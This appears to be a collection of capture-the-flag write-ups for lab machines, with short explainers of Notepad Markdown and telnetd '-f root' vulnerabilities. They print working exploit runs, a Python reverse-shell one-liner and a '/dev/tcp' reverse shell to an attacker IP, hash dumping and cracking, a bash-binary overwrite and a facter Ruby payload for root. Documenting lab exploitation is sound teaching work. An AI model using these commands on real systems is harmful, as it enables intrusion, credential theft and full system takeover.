  -d devarea.htb

got

[Unit]
Description=HoverFly service
After=network.target

[Service]
User=dev_ryan
Group=dev_ryan
WorkingDirectory=/opt/HoverFly
ExecStart=/opt/HoverFly/hoverfly -add -username admin -password redact -listen-on-host 0.0.0.0

Restart=on-failure
RestartSec=5

Credentials Found: admin:redact for Hoverfly Dashboard!

Hoverfly Dashboard & RCE

Accessing the Dashboard

Navigate to http://devarea.htb:8888 and log in with:

• Username: admin
• Password: redact

CVE-2025-54123 - Hoverfly RCE as discovered earlier

Exploit Script:

python3 CVE-2025-54123.py \
  -u admin \
  -p redact \
  -c "whoami" \
  -t http://devarea.htb:8888

[+] Login on http://devarea.htb:8888/api/token-auth
[+] Token: eyJhbGciOiJIUzUxMiIs...
[+] Sending RCE: whoami

=== OUTPUT ===
dev_ryan

** Command execution confirmed!** now upgrade to a reverse shell.

Spawning a Reverse Shell

nc -lvnp 4444

python3 CVE-2025-54123.py -u admin -p redact -c "whoami" -t http://devarea.htb:8888 -r 10.10.15.9 4444

wohoo got the shell

connect to [10.10.15.9] from (UNKNOWN) [10.129.244.208] 58104
bash: cannot set terminal process group (1461): Inappropriate ioctl for device
bash: no job control in this shell
dev_ryan@devarea:/opt/HoverFly$

User Flag

With our shell established, let’s grab that user flag.

dev_ryan@devarea:/$ 
find . -name "user.txt"
./home/dev_ryan/user.txt
cat /home/dev_ryan/user.txt

Privilege Escalation Analysis

sudo -l

Matching Defaults entries for dev_ryan on devarea:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User dev_ryan may run the following commands on devarea:
    (root) NOPASSWD: /opt/syswatch/syswatch.sh

Privesc Vector: woa i can run /opt/syswatch/syswatch.sh as root without a password! in the same dir where i found the user flag i also discovered a script called syswatch.zip

Key Finding: The script calls /usr/bin/bash in several functions. But here’s the kicker:

ls -la /usr/bin/bash
# Output: -rwxrwxrwx 1 root root 1396520 ... /usr/bin/bash

CRITICAL MISCONFIGURATION: /usr/bin/bash is world-writable! Anyone can modify the system’s bash binary.

Root Exploitation

Setting Up a Clean Shell

Our current reverse shell is bash-based, which would be killed when we terminate all bash processes. We need a clean, non-bash shell.

On Kali (Second Listener):

nc -lvnp 5332

From existing shell, send a Python PTY shell:

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.15.9",5332));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Shell Received on port 5332:

$ id
uid=1001(dev_ryan) gid=1001(dev_ryan) groups=1001(dev_ryan)

Clean shell acquired! This is /bin/sh, not bash.

Creating the Malicious Payload

# Backup the real bash binary
cp /usr/bin/bash /tmp/bash.bak

# Create our payload script
echo '#!/tmp/bash.bak' > /tmp/bash_payload
echo 'chmod u+s /usr/bin/python3' >> /tmp/bash_payload

# Make it executable
chmod +x /tmp/bash_payload

# Verify contents
cat /tmp/bash_payload

Payload Contents:

#!/tmp/bash.bak
chmod u+s /usr/bin/python3

What this does: When executed as root, it sets the SUID bit on Python3. SUID binaries run with the owner’s permissions (root), regardless of who executes them.

Killing Bash Processes

We need to free /usr/bin/bash so we can overwrite it.

# Find all bash processes
ps aux | grep bash | grep -v grep

Output:

dev_ryan    5267  0.0  0.1   8544  5508 ?        S    07:07   0:00 bash -i
dev_ryan    5546  0.0  0.0   7340  3668 ?        S    07:15   0:00 /bin/bash /tmp/hoverfly/hoverfly_3324889479
dev_ryan    5547  0.0  0.0   7340  3616 ?        S    07:15   0:00 bash -c bash -i >& /dev/tcp/10.10.15.9/4444 0>&1
dev_ryan    5548  0.0  0.1   8544  5508 ?        S    07:15   0:00 bash -i

# Kill all bash processes
kill -9 5267 5546 5547 5548

# Verify no processes are using /usr/bin/bash
lsof /usr/bin/bash
# (No output = file is free)

Note: Our original shell on port 4444 died here - that’s why we created the second shell!

Deploying the Payload

# Overwrite the system bash binary
cp /tmp/bash_payload /usr/bin/bash

# Verify the replacement
ls -la /usr/bin/bash
cat /usr/bin/bash

Output:

-rwxrwxrwx 1 root root 43 Apr  9 07:21 /usr/bin/bash
#!/tmp/bash.bak
chmod u+s /usr/bin/python3

Triggering the Exploit

sudo /opt/syswatch/syswatch.sh web-status

The syswatch.sh script runs as root and calls /usr/bin/bash, executing our payload with root privileges!

Checking for SUID Python3

ls -la /usr/bin/python3

Before: lrwxrwxrwx 1 root root 10 /usr/bin/python3 -> python3.12
After: The actual python3.12 binary now has the SUID bit set.

Spawning Root Shell

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

# id
uid=0(root) gid=1001(dev_ryan) groups=1001(dev_ryan)

WE ARE ROOT!

Flag

# cat /root/root.txt

Note : there are more alternatives ways to get root btw — Thanks for reading! Happy hacking! 🚀

hlw guys, i am back today target: cctv.htb let’s exploit it together!

Recon

so after getting the ip i first ran

rustscan -a 10.129.12.97

found 2 ports open: 22 and 80 after heading over to port 80 there is a page mostly named SecureVison then i ran gobuster as well as fuzzing subdomains, nothing found interesting !

next i checked the staff login button

i found zoneminder login it’s a “A full-featured, open source, state-of-the-art video surveillance software system. Monitor your home, office, or wherever you want.” i checked the default creds for login and saw the default creds are admin/admin

version running: v1.37.63 i quickly googled the exact version in order to search for vulnerabilities related to it and wowa, found CVE-2024-51482

https://github.com/BridgerAlderson/CVE-2024-51482 there is a blind sql injection vulnerability http://target/zm/index.php?view=request&request=event&action=removetag&tid=[INJECTION_POINT]

python3 CVE-2024-51482.py -i cctv.htb -u admin -p admin --discover
[*] CVE-2024-51482 - ZoneMinder Blind SQL Injection Exploit
[*] Target: cctv.htb

[*] Logging in as 'admin' on cctv.htb...
[+] Login successful
[*] Measuring baseline response time...
[*] Baseline median: 0.284s
[*] Testing vulnerability with 2s sleep...
[*] Response time: 2.36s
[+] Target is vulnerable!
[*] Enumerating databases...
[+] Found database: information_schema                
[+] Found database: performance_schema                                 
[+] Found database: zm

let’s try to dump the username and password table

python3 CVE-2024-51482.py -i cctv.htb -u admin -p admin --dump zm Users "Username,Password"
[*] CVE-2024-51482 - ZoneMinder Blind SQL Injection Exploit
[*] Target: cctv.htb

[*] Logging in as 'admin' on cctv.htb...
[+] Login successful
[*] Measuring baseline response time...
[*] Baseline median: 0.259s
[*] Testing vulnerability with 2s sleep...
[*] Response time: 2.27s
[+] Target is vulnerable!
[*] Dumping data from 'zm.Users'...
[*] Row 1: {'Username': 'admin                                   &            #                8              #  #                                       ', 'Password': '$2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0krtbm                      &                                             '}
[*] Row 2: {'Username': 'mark                                                                     /                                                      ', 'Password': '$2y$10$prZGnazejKcuTv5bKNexYOgLyQaok0hq07LW7AJ

it’s a bcrypt hash, let’s try to crack it using hashcat

echo "markhashhere" > hash.txt
hashcat -m 3200[for bcrypt hash] hash.txt [your preferred wordlist here] recommended rockyou.txt

after getting the password try to connect using ssh

ssh mark@cctv.htb               
The authenticity of host 'cctv.htb (10.129.12.97)' can't be established.
ED25519 key fingerprint is SHA256:KrrHjS+nu1wJEfv1/NxT1fI+ODJaSRdJtFg201G+tO0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cctv.htb' (ED25519) to the list of known hosts.
mark@cctv.htb's password: 
Permission denied, please try again.
mark@cctv.htb's password: 
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-101-generic x86_64)
mark@cctv:~$
mark@cctv:~$ ls -la 
total 40
drwxr-x--- 6 mark mark 4096 Mar 26 14:55 .
drwxr-xr-x 4 root root 4096 Mar  2 09:49 ..
lrwxrwxrwx 1 root root    9 Feb 13 10:01 .bash_history -> /dev/null
-rw-r--r-- 1 mark mark  220 Mar 31  2024 .bash_logout
-rw-r--r-- 1 mark mark 3771 Mar 31  2024 .bashrc
drwx------ 2 mark mark 4096 Mar  2 09:49 .cache
drwx------ 3 mark mark 4096 Mar  2 09:49 .gnupg
drwxrwxr-x 3 mark mark 4096 Mar 26 14:55 .local
-rw-r--r-- 1 mark mark  807 Mar 31  2024 .profile
drwx------ 2 mark mark 4096 Mar  2 09:49 .ssh
-rw-rw-r-- 1 mark mark  165 Sep 14  2025 .wget-hsts
mark@cctv:~$ id
uid=1000(mark) gid=1000(mark) groups=1000(mark),24(cdrom),30(dip),46(plugdev)
mark@cctv:~$ sudo -l
[sudo] password for mark: 
Sorry, user mark may not run sudo on cctv.
mark@cctv:~$ sudo -l
[sudo] password for mark: 
Sorry, user mark may not run sudo on cctv.
mark@cctv:~$

since it’s related to some cctv-related stuff, let’s check the services running inside it for that i used ss -tlnp

ss -tlnp
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process 
LISTEN 0      151        127.0.0.1:3306       0.0.0.0:*            
LISTEN 0      4096      127.0.0.54:53         0.0.0.0:*            
LISTEN 0      4096         0.0.0.0:22         0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:7999       0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:1935       0.0.0.0:*            
LISTEN 0      4096   127.0.0.53%lo:53         0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:8554       0.0.0.0:*            
LISTEN 0      70         127.0.0.1:33060      0.0.0.0:*            
LISTEN 0      128        127.0.0.1:8765       0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:8888       0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:9081       0.0.0.0:*            
LISTEN 0      4096            [::]:22            [::]:*            
LISTEN 0      511                *:80               *:*

then i quickly googled some ports like 7999,1935,8765 and found port 8765 is used for the motioneye service

motioneye “MotionEye is a web interface for the motion daemon, which is a video surveillance program that includes motion detection capabilities. It allows users to manage and visualize multiple camera feeds from a single platform”

the config file is located here Main Configuration File: The primary file for motionEye server settings is /etc/motioneye/motioneye.conf. This file defines paths for logs, media, and other global options

source: github official docs

then to interact with this web interface i needed to forward the port

ssh -L 8765:127.0.0.1:8765 mark@cctv.htb

got it there is a login page! i tried to login with the username as “admin” and the password associated with it found in config file and boom! then after seeing the version i found another CVE CVE-2025-60787 https://github.com/gunzf0x/CVE-2025-60787

“A critical Remote Code Execution (RCE) vulnerability exists in motionEye 0.43.1b4 and earlier versions, identified primarily as CVE-2025-60787 (also related to GHSA-j945-qm58-4gjx). This vulnerability allows an authenticated attacker with administrative access to execute arbitrary OS commands via the add_camera functionality in the web interface. “

since motioneye runs as root inside the machine, if we get a shell we can entirely access root as well no need for priv escalation

┌──(root㉿kali)-[/home/kali/Downloads/cctv/CVE-2025-60787]
└─# python3 CVE-2025-60787.py revshell \
--url 'http://127.0.0.1:8765' \
--user 'admin' \
--password 'redact' \
-i 10.10.14.84 \
--port 4444

make sure to start nc -lvnp 4444

[*] Attempting to connect to 'http://127.0.0.1:8765' with credentials 'admin:989c5a8ee87a0e9521ec81a79187d162109282f0'
[*] Valid credentials provided
[*] Obtaining cameras available
[*] Found 1 camera(s)
    1) Name: 'CAM 01' ; ID: 1; root_directory: '/var/lib/motioneye/Camera1'
[*] Using camera by default (first one found) for the exploit
[*] Payload successfully injected. Check your shell...
~Happy Hacking

got the shell

root@cctv:/# find / -name "root.txt"   
find / -name "root.txt" 
/root/root.txt
root@cctv:/# cd /root
cd /root
root@cctv:~# cat root.txt
cat root.txt

root@cctv:~# find / -name "user.txt" 
find / -name "user.txt" 
/home/sa_mark/user.txt
root@cctv:~# cd /home/sa_mark 
cd /home/sa_mark
root@cctv:/home/sa_mark# ls
ls
SecureVision Staff Announcement.pdf
user.txt
root@cctv:/home/sa_mark# cat user.txt
cat user.txt

root@cctv:/home/sa_mark#

happy hacking! btw if you really like my writeups please leave a comment so i can make it better. thanks btw!

lets analyze it together

References

• https://foss-daily.org/posts/microsoft-notepad-2026/
• https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841

Details

Overview

we all have used windows notepad right ? back to previous days in the era of windows 10 and 7 when windows notepad considered as only notepad with no bloated things and AI stuffs.

but in moderen Windows 11 added Markdown handling. The issue is that the Markdown link handler does not validate link protocols before execution. so a crafted .md file can trigger command execution when a user clicks a link.

“Someone at Microsoft thought “what if Notepad could execute commands?” and shipped it enabled by default. Attackers can now trick users into opening a malicious .md file, you click a link, and BAM, code runs with your full permissions. Full system compromise. It is that bad.

The vulnerability itself is straightforward. Notepad’s Markdown handler does not validate what is in those links before executing them. A specially made file with the right protocol prefix does the rest. Phishing a user to click becomes a full system compromise.”

Source: https://foss-daily.org/posts/microsoft-notepad-2026/

Attack Flow

1. An attacker sends a malicious .md file (for example, meeting-notes.md).
2. The victim opens it in Notepad and clicks a link.
3. The link triggers command execution instead of opening in a browser.
4. The attacker gets full system control.

Proof of Concept

• https://github.com/BTtea/CVE-2026-20841-PoC

Mitigation

• Update Notepad to 11.2510 or later. and for safely disable AI stuffs and turn of markdown preview. thats all folks happy hacking !

Initial Reconnaissance

its a easy machine ! lets start

after getting the ip first i run rustscan cause it really faster than nmap

rustscan -a 10.129.13.46 --ulimit 1000 -r 1-65535 -- -A -sC -Pn

Scan Results

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNYjzL0v+zbXt5Zvuhd63ZMVGK/8TRBsYpIitcmtFPexgvOxbFiv6VCm9ZzRBGKf0uoNaj69WYzveCNEWxdQUww=
|   256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPCNb2NXAGnDBofpLTCGLMyF/N6Xe5LIri/onyTBifIK
80/tcp    open  http    syn-ack ttl 63 nginx 1.26.3 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
54321/tcp open  http    syn-ack ttl 62 Golang net/http server
|_http-server-header: MinIO
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 303
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 189317C4741475EB
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Wed, 11 Feb 2026 04:46:51 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>189317C4741475EB</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   GenericLines, Help, RTSPRequest, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 189317C010F52C3E
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Wed, 11 Feb 2026 04:46:32 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>189317C010F52C3E</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Wed, 11 Feb 2026 04:46:32 GMT
|_    Content-Length: 0

Web Enumeration

after headover to port 80 the webserver hosts shows title facts.htb so quickly add it to /etc/hosts along with ip

http://facts.htb/ - its a simple blog or image sharing site

upon looking at the source code reveals its running something called Camaleon CMS

Camaleon CMS is a dynamic and advanced content management system based on Ruby on Rails

then quickly run gobuster

gobuster dir -u http://facts.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt

and found interesting a endpoint /admin

Exploitation - CVE-2025-2304

since i coudn’t detect the cms version i just searching latest CVE or vulnerability related to it then i found

https://github.com/predyy/CVE-2025-2304
CVE-2025-2304 - Camaleon CMS Privilege Escalation

A Privilege Escalation through a Mass Assignment exists in Camaleon CMS When a user wishes to change his password, the ‘updated_ajax’ method of the UsersController is called. The vulnerability stems from the use of the dangerous permit! method, which allows all parameters to pass through without any filtering.

Impact: An attacker can exploit this to modify object attributes, potentially leading to privilege escalation.

means if i just register as a new user and i can be able to be admin right ? so lets go

┌──(kali㉿blackXploit)-[~/Downloads/factshtb/CVE-2025-2304]
└─$ python3 exp.py http://facts.htb/admin test test@test
[*] Logging in as test ...
[+] Login successful
[+] Got profile page
[i] Version detected: 2.9.0 (< 2.9.1) - appears to be vulnerable version
[+] authenticity_token: PpN31aC00B4IEFOyQN4l8Zj7mkNFw4HpmQjDr7tH8emXiQMm_5RktUs_OANR-8xeE9P5A5LD3lLgnQlfT1VPyQ
http://facts.htb/admin/users/5/updated_ajax
[*] Submitting password change request
[+] Submit successful, you should be admin

now i am admin

AWS Credentials Discovery

after headover to http://facts.htb/admin/settings/site

i found juicy stuffs like AWS s3 access key now we can acess this stuff with the help of aws cli

└─$ aws s3 ls    

An error occurred (InvalidAccessKeyId) when calling the ListBuckets operation: The AWS Access Key Id you provided does not exist in our records.
                                             
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ aws configure --profile facts
AWS Access Key ID [None]: AKIA237FBBCAFC84DA9E
AWS Secret Access Key [None]: 1I6oQXf2PZH20fVOdFL+AKZ+gtZwH70nDg/atEKH
Default region name [None]: us-east-1
Default output format [None]: json
                                                                                                                                                                           
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ aws s3 ls --endpoint-url http://facts.htb:54321 --profile facts
2025-09-11 08:06:52 internal
2025-09-11 08:06:52 randomfacts

┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ aws s3 ls s3://internal/ --endpoint-url http://facts.htb:54321 --profile facts
                           PRE .bundle/
                           PRE .cache/
                           PRE .ssh/
2026-01-08 13:45:13        220 .bash_logout
2026-01-08 13:45:13       3900 .bashrc
2026-01-08 13:47:17         20 .lesshst
2026-01-08 13:47:17  

SSH Key Extraction

after dig into /internal dir we got .ssh then quicky cpy this to current dir

aws s3 cp s3://internal/.ssh /home/kali/Downloads/factshtb --endpoint-url http://facts.htb:54321 --profile facts --recursive
download: s3://internal/.ssh/id_ed25519 to ./id_ed25519             
download: s3://internal/.ssh/authorized_keys to ./authorized_keys 

Cracking SSH Key

the id i have got is encrypted so need to crack it fr that i use

python3 /usr/share/john/ssh2john.py id_ed25519 > key.john

┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt key.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dra[redact]      (id_ed25519)     
1g 0:00:06:18 DONE (2026-02-11 00:46) 0.002641g/s 8.452p/s 8.452c/s 8.452C/s fireman..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Getting User Access

i got the passphrase lets connect to port 22

┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ ssh-keygen -y -f id_ed25519 > id_ed25519.pub
Enter passphrase for "id_ed25519": 
                                                                                                                    
this will generate .pub file so we know the user                                                                                                  
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ ls
authorized_keys  CVE-2025-2304  id_ed25519  id_ed25519.hash  id_ed25519.pub  key.john  writeup.md
                                                                                                                    
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ cat id_ed25519.pub 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA6uqf/MuO5odDM453bZdApeHLnufnUfStkZcK5e/2QQ redacted@facts.htb
                                                                                                                                                                                
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ ssh -i id_ed25519 trivia@facts.htb
Enter passphrase for key 'id_ed25519': 
Last login: Wed Jan 28 16:17:19 UTC 2026 from 10.10.14.4 on ssh
Welcome to Ubuntu 25.04 (GNU/Linux 6.14.0-37-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Feb 11 06:26:36 AM UTC 2026

  System load:           0.13
  Usage of /:            74.2% of 7.28GB
  Memory usage:          19%
  Swap usage:            0%
  Processes:             221
  Users logged in:       1
  IPv4 address for eth0: 10.129.13.46
  IPv6 address for eth0: dead:beef::250:56ff:feb0:441b


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
trivia@facts:~$ ls
trivia@facts:/home$ ls
trivia  william
trivia@facts:/home$ cd william/
trivia@facts:/home/william$ ls
user.txt
trivia@facts:/home/william$ cat user.txt 
73f8a5[redacted]

Privilege Escalation to Root

next step is to get root for that use same method run sudo -l and notice

trivia@facts:/home/william$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

facter is a system profiling tool used by Puppet (configuration management), and it can execute Ruby code. Since you can run it as root with sudo and no password, you can exploit this to get a root shell.

lets craft the exploit

trivia@facts:/tmp$ mkdir -p /tmp/exploit
trivia@facts:/tmp$ cat > /tmp/exploit/root.rb << 'EOF'
Facter.add(:root_shell) do
  setcode do
    system("/bin/bash")
  end
end
EOF
trivia@facts:/tmp$ sudo /usr/bin/facter --custom-dir /tmp/exploit
root@facts:/tmp# 

i bet you , you cant find this type of writeup anywhere so if it helps please drop a comment below. thank you. thats all foxs ! have fun happy hacking.

its crazy ! CVE Score around 9.8/10

found in telnet [ Telnet (TELecommunication NETwork) is a foundational, text-based network protocol and application (running on TCP port 23) that enables a user to remotely access and manage another computer, server, or networking device via a command-line interface. Developed in 1969, it provides a virtual terminal connection, appearing as if the user is physically present at the remote machine ] source [ https://en.wikipedia.org/wiki/Telnet]

i recenly analyzed this crazy CVE and wondering how a tiny logic can spawn root shell after hiding for 11 years

how it works ?

think of like Telnet Server as a bouncer at a club who ask for your ID before enter

The Handshake: When you connect to a Telnet server, the server and your computer exchange some “environment variables”—basic info like your username.

The Command: Normally, the Telnet server takes the username you give it and runs a command like: login [your_username]

The Flaw (Argument Injection): The server doesn’t check what you put in the username field. An attacker can send a special “username” like -f root.

The Result: The server blindly runs the command: login -h [hostname] -f root

In Linux systems, the -f flag stands for “force” or “fast” login. It tells the system: “I’ve already checked this person’s ID, just let them in as the root user immediately.” Because the server trustingly passed that flag along, it bypasses the password screen entirely and drops the attacker directly into a root command prompt.

This bug was accidentally added to the code in 2015 and sat there undiscovered until 2026

if you look closely , you can see that the developers knew about the danger for the USER environment variable (case ‘U’), but they completely forgot to apply that same logic to the standard user_name variable (case ‘u’).

The Logic Gap In the code snippet, notice the difference between these two cases:

case ‘u’ (The Vulnerable One): return user_name ? xstrdup (user_name) : NULL; It just takes whatever string is in user_name and hands it over. If an attacker sends -froot, the system accepts it without question.

case ‘U’ (The Protected One): The code below it actually has a comment: /* Ignore user names starting with ‘-‘… as they can cause trouble. */. They wrote a specific check here to prevent exactly what CVE-2026-24061 exploits.

How an Attacker Abuses This Because case ‘u’ was left unprotected, the attack follows this path:

Connection: The attacker connects via Telnet.

Environment Negotiation: The Telnet client sends an environment variable for the username.

The Payload: Instead of blackxploit, the attacker sends -froot.

The Expansion: The code hits case ‘u’, sees -froot, and calls xstrdup(“-froot”).

The Execution: The server then executes: login -h -froot.

The Bypass: The login program sees the -f flag and says, “Okay, I’ll log you in as root without a password.”

By creating sanitize(), the developers moved that logic from case ‘U’ into a reusable tool and applied it to all cases (‘h’, ‘l’, ‘L’, ‘t’, ‘T’, and ‘u’). This ensured that no matter which variable an attacker tried to mess with, the leading - would always be caught.

here is the exploit : https://github.com/JayGLXR/CVE-2026-24061-POC

i know its 2026 and no one use telnet but for those who use Update your GNU InetUtils to version 2.7-2 or newer immediately.

Thanks for reading !